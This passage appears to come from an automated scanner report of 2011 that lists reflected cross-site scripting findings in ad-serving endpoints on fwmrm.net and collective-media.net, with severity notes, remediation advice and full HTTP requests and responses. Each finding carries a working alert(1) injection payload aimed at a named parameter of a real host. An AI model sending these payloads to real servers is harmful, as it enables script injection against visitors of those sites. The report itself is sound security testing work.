Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home441f3"%3balert(1)//f9173373918&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5615
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:07:37 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
dow._fw_slot_urls.length) setTimeout(f, 10);
       setTimeout(d, 15000);
   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=-1&ssnw=&csid=idol_home441f3";alert(1)//f9173373918&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, fal
...[SNIP]...

1.4. http://1c6e2.v.fwmrm.net/ad/g/1 [flag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the flag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc08e"%3balert(1)//e62c1b5dde6 was submitted in the flag parameter. This input was echoed as dc08e";alert(1)//e62c1b5dde6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&flag=-ptildc08e"%3balert(1)//e62c1b5dde6&pvrn=649564&csid=idol_home&resp=ad;position=1;ptgt=s&envp=g_js&slid=174x174slot1&w=174&h=174 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209; _sid="b117_5659730864117770987"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317758783.0,20486.1317756298.0,20487.1317753554.0,20661.1317758783.0,^"; _pr="1317758780.438724.273825~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317758783.28800.0.4,sg143516.1317753552.1317758783.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5674
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:23 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...

   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=649564&vprn=&vip=50.23.123.106&vdur=&flag=-ptildc08e";alert(1)//e62c1b5dde6;position=1&;ptgt=s&slid=174x174slot1&envp=g_js&w=174&h=174&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEventListener( "load", e,
...[SNIP]...

1.5. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the pvrn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82666"%3balert(1)//929ea7ec66e was submitted in the pvrn parameter. This input was echoed as 82666";alert(1)//929ea7ec66e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=35583982666"%3balert(1)//929ea7ec66e&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5621
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:07:13 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
etTimeout(f, 10);
       setTimeout(d, 15000);
   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=35583982666";alert(1)//929ea7ec66e&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEven
...[SNIP]...

1.6. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the slid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77dd0'%3balert(1)//c3631c732ca was submitted in the slid parameter. This input was echoed as 77dd0';alert(1)//c3631c732ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot77dd0'%3balert(1)//c3631c732ca&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5817
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:08:14 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
id=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot77dd0';alert(1)//c3631c732ca&envp=g_js&w=728&h=90&lo=";
var v = ('ptgt=s&slid=728x90slot77dd0';alert(1)//c3631c732ca&envp=g_js&w=728&h=90&lo=').replace(/envp=g_js/, '');
document.write(ct ? '<span id="728x90slot77dd0';alert(1)//c3631c732ca" class="_fwph">
...[SNIP]...

1.7. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the slid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ac4b"%3balert(1)//c5398e2c7f1 was submitted in the slid parameter. This input was echoed as 8ac4b";alert(1)//c5398e2c7f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot8ac4b"%3balert(1)//c5398e2c7f1&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5817
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:08:11 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
ot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot8ac4b";alert(1)//c5398e2c7f1&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEventListener( "load", e, false );
   } else if (window.attachEven
...[SNIP]...

1.8. http://1c6e2.v.fwmrm.net/ad/g/1 [ssid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the ssid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb280"%3balert(1)//c49b9d5dfef was submitted in the ssid parameter. This input was echoed as cb280";alert(1)//c49b9d5dfef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766cb280"%3balert(1)//c49b9d5dfef&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759053.0,20487.1317759053.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759077.438724.273825~,1317759069.649564.253944~254114~254701~254705~254706~327790~327796~,1317759029.649564a2e5761a53c8824f4df602c.253944~,1317759028.a2e5761a1295382b71812f2c.253944~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759077.28800.0.0,sg141659.1317753567.1317759077.28800.0.4,sg143516.1317753552.1317759077.28800.0.0,";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10311
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:16 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
,
{name:"_fw_creative_name", _:"FOX_20thCenturyFox_HP_300x250_RB_10/4 "
}]}
}]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766cb280";alert(1)//c49b9d5dfef", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{
...[SNIP]...

1.9. http://1c6e2.v.fwmrm.net/ad/g/1 [vprn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the vprn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b897"%3balert(1)//9d48bff7a00 was submitted in the vprn parameter. This input was echoed as 4b897";alert(1)//9d48bff7a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=4b897"%3balert(1)//9d48bff7a00&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759064.0,20487.1317759064.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759136.753420735476538500.544603~664977~687378~,1317759135.438724.273825~,1317759133.753420735476538500]]>>.687378~,1317759132.753420735476538500".687378~,1317759131.753420735476538500
Set-Cookie: _sc="sg127945.1317758965.1317759136.28800.0.0,sg141659.1317753567.1317759136.28800.0.4,sg143516.1317753552.1317759136.28800.0.0,";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10330
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:12:15 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1", videoPlayRandom:"4b897";alert(1)//9d48bff7a00", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"adReferenc
...[SNIP]...

1.10. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6604e'-alert(1)-'f0a94848b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.3interactive.ron6604e'-alert(1)-'f0a94848b6/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 498
Date: Tue, 04 Oct 2011 20:31:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:19 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron6604e'-alert(1)-'f0a94848b6/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.11. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40e0a'-alert(1)-'c3c00823c89 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros40e0a'-alert(1)-'c3c00823c89;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
